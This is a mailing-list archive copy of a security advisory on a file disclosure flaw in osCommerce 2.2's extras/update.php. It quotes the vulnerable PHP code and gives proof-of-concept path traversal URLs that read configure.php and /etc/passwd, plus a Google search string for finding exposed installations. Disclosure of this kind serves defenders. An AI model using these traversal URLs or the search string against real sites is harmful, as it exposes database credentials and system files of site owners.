No subject


Thu Nov 23 16:34:03 EST 2017


---- osCommerce <=3D 2.2 "extras/" information/source code disclosure
------------

software site: http://www.oscommerce.com/


if extras/ folder is placed inside the www path, you can see all files
on target system, including php source code with database details, poc:

http://[target]/[path]/extras/update.php?read_me=3D0&readme_file=3D../catalo
g/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=3D0&readme_file=3D/etc/pass
wd

this is the vulnerable code in update.php:

...
	include '../mysql.php';
	// if a readme.txt file exists, display it to the user
	if(!$read_me) {
		if(file_exists('readme.txt')) {
			$readme_file =3D 'readme.txt';
		}
		elseif(file_exists('README')) {
			$readme_file =3D 'README';
		}
		elseif(file_exists('readme')) {
			$readme_file =3D 'readme';
		}
		if($readme_file) {
			$readme =3D file($readme_file);
			print "<CENTER><TABLE BORDER=3D\"1\" WIDTH=3D\"75%\"
CELLPADDING=3D\"2\" CELLSPACING=3D\"0\"><TR BGCOLOR=3D\"#e7e7cc\"><TD>\n";
			print nl2br(htmlentities(implode($readme, '
')));
			print "<HR NOSHADE SIZE=3D\"1\"><CENTER><A
HREF=3D\"update.php?read_me=3D1\"><B>Continue</B></A></CENTER>\n";
			print "</TD></TR></TABLE>\n";
			exit;
		}
	}
...

google search:

inurl:"extras/update.php" intext:mysql.php -display

------------------------------------------------------------------------
--------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
------------------------------------------------------------------------
--------







More information about the Snort-sigs mailing list